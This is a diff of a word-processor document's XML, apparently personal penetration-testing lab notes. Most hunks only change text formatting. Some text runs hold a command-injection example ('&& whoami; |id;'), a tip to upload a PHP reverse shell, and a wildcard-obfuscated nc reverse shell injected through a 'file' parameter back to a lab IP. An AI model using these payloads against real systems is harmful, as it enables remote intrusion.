           </w:rPr>
           <w:t>http://192.168.130.168:8080</w:t>
@@ -14019,7 +15535,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14037,7 +15560,14 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14151,27 +15681,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i/>
           <w:i/>
           <w:iCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t>Traversal file is Traversal_htpasswd.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14183,6 +15703,26 @@
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+        <w:t>Traversal file is Traversal_htpasswd.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t>-</w:t>
       </w:r>
       <w:r>
@@ -14228,27 +15768,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ex 127.0.0.1 &amp;&amp; whoami; |id; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14260,7 +15790,7 @@
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t>We can use command injection intruder from AllTheThings</w:t>
+        <w:t xml:space="preserve">Ex 127.0.0.1 &amp;&amp; whoami; |id; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14268,18 +15798,58 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>We can use command injection intruder from AllTheThings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t>-When we have a command injection vulnerability on web and command are not working, just try to upload a php reverse shell and run it from the webserver ex</w:t>
       </w:r>
     </w:p>
@@ -14288,7 +15858,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14365,7 +15945,7 @@
       <w:hyperlink r:id="rId41">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel13"/>
             <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -14373,6 +15953,7 @@
             <w:kern w:val="0"/>
             <w:sz w:val="24"/>
             <w:szCs w:val="24"/>
+            <w:u w:val="single"/>
             <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>http://192.168.130.170/test.php?file=last.htm</w:t>
@@ -14381,7 +15962,7 @@
       <w:hyperlink r:id="rId42">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel14"/>
             <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -14390,6 +15971,7 @@
             <w:sz w:val="24"/>
             <w:szCs w:val="24"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
             <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>l;id</w:t>
@@ -14419,7 +16001,7 @@
       <w:hyperlink r:id="rId43">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel13"/>
             <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -14427,6 +16009,7 @@
             <w:kern w:val="0"/>
             <w:sz w:val="24"/>
             <w:szCs w:val="24"/>
+            <w:u w:val="single"/>
             <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>https://medium.com/secjuice/waf-evasion-techniques-718026d693d8</w:t>
@@ -14456,7 +16039,7 @@
       <w:hyperlink r:id="rId44">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel13"/>
             <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -14464,6 +16047,7 @@
             <w:kern w:val="0"/>
             <w:sz w:val="24"/>
             <w:szCs w:val="24"/>
+            <w:u w:val="single"/>
             <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>http://192.168.130.170/test.php?file=last.html;</w:t>
@@ -14472,7 +16056,7 @@
       <w:hyperlink r:id="rId45">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel14"/>
             <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -14481,6 +16065,7 @@
             <w:sz w:val="24"/>
             <w:szCs w:val="24"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
             <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t>/b?n/?c</w:t>
@@ -14489,7 +16074,7 @@
       <w:hyperlink r:id="rId46">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel14"/>
             <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -14498,6 +16083,7 @@
             <w:sz w:val="24"/>
             <w:szCs w:val="24"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
             <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
           </w:rPr>
           <w:t xml:space="preserve"> 192.168.130.1 1234 -e /b?n/b?sh</w:t>
@@ -14509,7 +16095,18 @@
         <w:pStyle w:val="PreformattedText"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14565,7 +16162,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14586,7 +16193,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14607,7 +16224,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14628,7 +16255,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14893,7 +16530,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14914,7 +16561,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14933,7 +16590,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14945,7 +16604,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14957,7 +16618,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14969,7 +16632,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14981,7 +16646,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14993,7 +16660,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15005,7 +16674,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15042,7 +16713,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15063,7 +16744,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15089,7 +16780,17 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15108,7 +16809,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15121,7 +16825,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15134,7 +16841,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15147,7 +16857,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15160,7 +16873,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15245,7 +16961,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15477,7 +17204,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15499,7 +17237,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15521,7 +17270,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15543,7 +17303,19 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:drawing>
@@ -15690,7 +17462,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15712,7 +17495,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15734,7 +17528,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15756,7 +17561,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15778,7 +17594,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15800,7 +17627,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
